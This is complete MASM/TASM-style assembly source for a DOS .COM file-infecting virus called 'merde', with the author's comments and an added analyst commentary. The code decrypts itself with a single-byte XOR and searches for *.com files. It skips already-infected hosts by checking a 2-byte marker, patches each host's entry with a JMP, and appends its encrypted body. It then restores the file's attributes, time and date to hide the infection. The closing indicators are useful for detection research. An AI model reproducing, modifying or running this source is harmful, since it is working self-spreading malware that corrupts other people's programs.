;well, here's the next installment of the merde virus...all that is new;
;is your run of the mill xor encryption........and a little change in;
;the code itself to make it slightly more modular...;
;up+coming: .exe version(why put 'em together? makes it too big);
; an actual function besides infect!;
; TSR infect version?;

;-----------------------------------------------------------------------
; Analyst notes (added on review; the author's own comments below are
; kept verbatim).
;
; Dialect: MASM/TASM-style syntax (SEGMENT/ASSUME/ENDS, "word ptr",
; "db ?", DUP(?)), not NASM as the listing label says.  16-bit real-mode
; DOS .COM image (ORG 100h); every OS interaction is an INT 21h call.
;
; What the listing shows, in execution order:
;   1. "first" jumps to "caller"; "caller2" recovers the load address of
;      "caller" into SI, and "getstart"/"after" recover the address of
;      "start" into ES.  Everything from "start" onward is stored XOR-ed
;      with the single byte at "encryptv" (SI+3) and is decoded in place
;      by "encrypt" (0E8h bytes starting at ES) before it runs.
;   2. "start" copies the host's original first 3 bytes (first_3) back to
;      offset 100h and keeps BP=100h as the final jump target, then walks
;      FindFirst/FindNext (AH=4Eh/4Fh) over the "*.com" pattern in fspec,
;      skipping files whose size word is above 65000 or below 150.
;   3. Already-infected test: the candidate's first 3 bytes are read; if
;      the first is 0E9h (JMP rel16) the code seeks to
;      rel16 + 3 + byte_compare_val and compares the 2 bytes there with
;      the 2 bytes at SI+byte_compare_val in the running copy.  Equal
;      means already infected: stats are restored and the file skipped.
;   4. Infection: the key byte is set to the low byte of the host's size
;      (dta+filesize), a JMP to offset (size-3) is written over the
;      host's first 3 bytes, virsize (354) bytes counted from "caller"
;      are appended, and attribute, time and date are put back
;      (AX=5701h, AH=3Eh, AX=4301h) so the directory entry looks
;      unchanged.
;   5. Control finally returns to 100h (BP); in the dropper first_3 holds
;      INT 20h, so the dropper simply terminates.
;
; Static indicators visible in this listing: a leading 0E9h in the host,
; 354 appended bytes, an unencoded stub ("caller" .. "getstart") with a
; stable 2-byte marker at stub offset byte_compare_val, a host size in
; 150..65000, and an unchanged time/date despite the size change.
;-----------------------------------------------------------------------

attrib            equ 21                  ; DTA offset of the attribute byte
time              equ 22                  ; DTA offset of the time word
date              equ 24                  ; DTA offset of the date word
fspec_address     equ 0e4h                ; offset of fspec from "start" (DI = ES + this)
filesize          equ 26                  ; DTA offset of the size word that is compared
fname             equ 30                  ; DTA offset of the ASCIIZ file name
dta               equ 80h                 ; default DTA in the PSP
virsize           equ 354                 ; bytes appended to a host, counted from "caller"
byte_compare_val  equ 35                  ; stub offset of the 2-byte infection marker

CODE_SEG SEGMENT BYTE
        ASSUME  DS:CODE_SEG, CS:CODE_SEG
        ORG     100h

first:  jmp     caller                  ; .COM entry at 100h; in a host these 3 bytes are what the infector replaces
        db      128 dup(00)             ; padding present only in the dropper; it lies before "caller" so it is never written out

caller: call    caller2                 ;si=this address for the whole thing;

;ok, for encryption, we use the value of the byte at the jump instruction;
;if the file we find isn't infected...;

encryptv: db    ?                       ; XOR key byte: read as [si+3] by "encrypt", set per host at label1

;si=offset of the "caller";

caller2: pop    si                      ; return address = encryptv
        sub     si,3                    ; si = "caller", the first byte of the appended image
        jmp     getstart

;jmp to getstart and have it call us back, getting the address of "start";
;into es..(I know, why not just add the size of the stuff to si?;
;I'll do it some other time;

after:  pop     es                      ;es=start:;

;okay, I decided, arbitrarily, to use bp and jump from the encrypt;
;function so it was more unsingular to a particular circumstance;

        mov     bp,es                   ;unencrypt de code+jump to virus;
        jmp     encrypt

;if we are being called from the write proc, we need to save BP on the stack;

encrypt_w: mov  ax,bp                   ;ax=whereto jump at end;
        pop     bp                      ;bp=return to write routine;
        push    ax                      ;where to jump at end is on stack

;note the standard, run o' the mill encrypt/decrypt!;

encrypt: push   bx                      ;might not be needed, I'll check later;
        push    si
        mov     cl,[si+3]               ;offset of encrypt value;
        mov     bx,es                   ;where to start encrypting;
        xor     si,si
xloop:  mov     al,[bx+si]
        xor     al,cl                   ; single-byte XOR; the same loop both encodes and decodes
        mov     [bx+si],al
        cmp     si,0e7h                 ;size of post-start(or close enough);
        ja      done                    ; unsigned compare: offsets 0..0e7h (0e8h bytes) are processed
        inc     si
        jmp     xloop
done:   pop     si
        pop     bx
        jmp     bp                      ;jump whereever we were supposed to;

write_code: call encrypt_w              ;yep, encrypt it;
        pop     bp                      ;get back address in this infected file;
        mov     bx,[di+9]               ;file to jump to, and file handle;
        mov     ah,40h                  ; INT 21h/AH=40h: write cx bytes from ds:dx to handle bx
        mov     cx,virsize              ;total virus size
        mov     dx,si                   ; the written image starts at "caller"
        int     21h                     ; the write's return value is not checked
        call    close_current
        jmp     nofiles                 ;not really, just didn't change name;

;this proc closes the file with original stats;
close_current:
        mov     dx,[di+14]              ; saved date (odate)
        mov     cx,[di+12]              ; saved time (otime)
        mov     ax,5701h                ; INT 21h/AX=5701h: set date/time of handle bx
        mov     bx,[di+9]
        int     21h
        mov     ah,3eh                  ; INT 21h/AH=3Eh: close handle bx
        int     21h
        mov     ax,4301h                ; INT 21h/AX=4301h: set attributes of the path at ds:dx
        xor     ch,ch
        mov     cl,[di+11]              ; saved attribute byte
        int     21h                     ; dx is not reloaded here; it still holds the date word rather than a file name
        ret

nofiles: push   ds                      ; es = ds again before handing over to the host
        pop     es
        jmp     bp                      ; bp = 100h here: run the restored host (INT 20h in the dropper)

getstart: call  after                   ; pushes the address of "start", which "after" pops into es

;encrypted from here on out-es=start of this procedure;
start:  mov     di,es
        add     di,fspec_address        ;di=ADDRESS OF FILESPEC!;
        mov     dh,[di+18]              ; first_3: the host's original 3 bytes ...
        mov     ah,[di+17]
        mov     al,[di+16]
        mov     bx,100h
        mov     [bx],al                 ; ... are put back at 100h before the host gets control
        mov     [bx+1],ah
        mov     [bx+2],dh
        mov     bp,bx                   ; bp = 100h: where "nofiles" finally jumps
        mov     ah,4eh                  ;------------------; INT 21h/AH=4Eh: FindFirst
        mov     cx,33                   ; search attribute mask 21h (read-only + archive)
        mov     dx,di                   ;find file match;  ds:dx = fspec ("*.com")
search: int     21h
        jc      nofiles                 ;get out if none found;
        mov     bx,dta+filesize         ;compare filesize via BX;
        cmp     word ptr [bx],65000
        ja      leave1                  ; skip hosts whose size word is above 65000
        cmp     word ptr [bx],150
        jb      leave1                  ; skip hosts whose size word is below 150
        jmp     ok
leave1: mov     ah,4fh                  ; INT 21h/AH=4Fh: FindNext, same DTA
        jmp     search
ok:     CLC

;Okay-- DI=base of fspec;
        mov     bx,dta+attrib
        mov     al,[bx]
        mov     [di+11],al              ;save attrib;
        mov     ax,word ptr [bx+1]      ; dta+time
        mov     [di+12],ax              ;save time;
        mov     ax,word ptr [bx+3]      ; dta+date
        mov     [di+14],ax              ;save date;
        mov     ax,4301h                ; INT 21h/AX=4301h with cx=0: clear the attributes ...
        mov     cx,0
        mov     dx,dta+fname            ; ... of the found file, so it can be opened for writing
        int     21h                     ;set attrib to 0;
label2: mov     ax,3d02h                ; INT 21h/AX=3D02h: open read/write (ds:dx still = name)
        int     21h
        mov     [di+9],ax               ;open + save handle;
        mov     bx,ax
        mov     ah,3fh                  ; INT 21h/AH=3Fh: read cx bytes into ds:dx
        mov     cx,3
        mov     dx,di
        add     dx,16                   ;dx points to save area for first three bytes;
        int     21h                     ;open handle, and read 3 bytes into it;
        cmp     byte ptr [di+16],0e9h   ; does the host already begin with JMP rel16?
        jne     label1                  ; no -> treated as clean, infect
cont:   mov     ax,4200h                ; INT 21h/AX=4200h: seek from start of file
        xor     cx,cx
        mov     dx,[di+17]              ; rel16 operand of the host's JMP
        add     dx,3+byte_compare_val   ; file offset of the jump target plus the marker offset
        mov     bx,[di+9]
        int     21h
        mov     ah,3fh                  ; read the 2 marker bytes into di+6 (disk_buffer)
        mov     cx,2
        mov     dx,di
        add     dx,6
        int     21h
        mov     dx,[di+6]
        cmp     dx,[si+byte_compare_val] ; same 2 bytes as in our own stub?
        jne     label1                  ; no -> infect
        call    close_current           ; yes -> already infected: restore stats, move on
        jmp     leave1
label1:
;set encrypt value here---(low order byte of filesize of next file;
        mov     bx,dta+filesize
        mov     dl,[bx]
        mov     [si+3],dl               ; per-host key = low byte of host size, stored at encryptv
        mov     bx,[di+9]
        mov     ax,4200h                ; seek to offset 0
        xor     cx,cx
        mov     dx,0
        int     21h
;okay, this is kinda thick..;
;set pointer to after jmp instruct, and change address to size;
;of file plus 3 for jmp instruction, minding that we have to flip stuff;
        mov     bx,dta+filesize
        mov     dh,[bx+1]               ;high val equals 2nd part of word+vice versa;
        mov     dl,[bx]                 ; dx = host size word
        sub     dx,3                    ; rel16 such that the JMP lands at file offset = old size
        mov     [di+7],dx
        mov     byte ptr [di+6],0e9h    ; disk_buffer = E9 rel16
        mov     ah,40h                  ; INT 21h/AH=40h: write the 3-byte JMP over the host's start
        mov     bx,[di+9]
        mov     dx,di
        add     dx,6
        mov     cx,3
        int     21h
        xor     cx,cx
        mov     ax,4202h                ; INT 21h/AX=4202h: seek to end of file
        xor     dx,dx
        int     21h
        jmp     write_code              ; append the re-encoded image

fspec:  db      '*.com',0               ;bx+0;
disk_buffer: db 3 DUP(?)                ;di+6;
handle: dw      ?                       ;di+9;
attribute: db   ?                       ;di+11;
otime:  dw      ?                       ;di+12;
odate:  dw      ?                       ;di+14;
first_3: db     0cdh,20h,00             ;di+16;  INT 20h: the dropper terminates once control reaches 100h
CODE_SEG ENDS
        END     first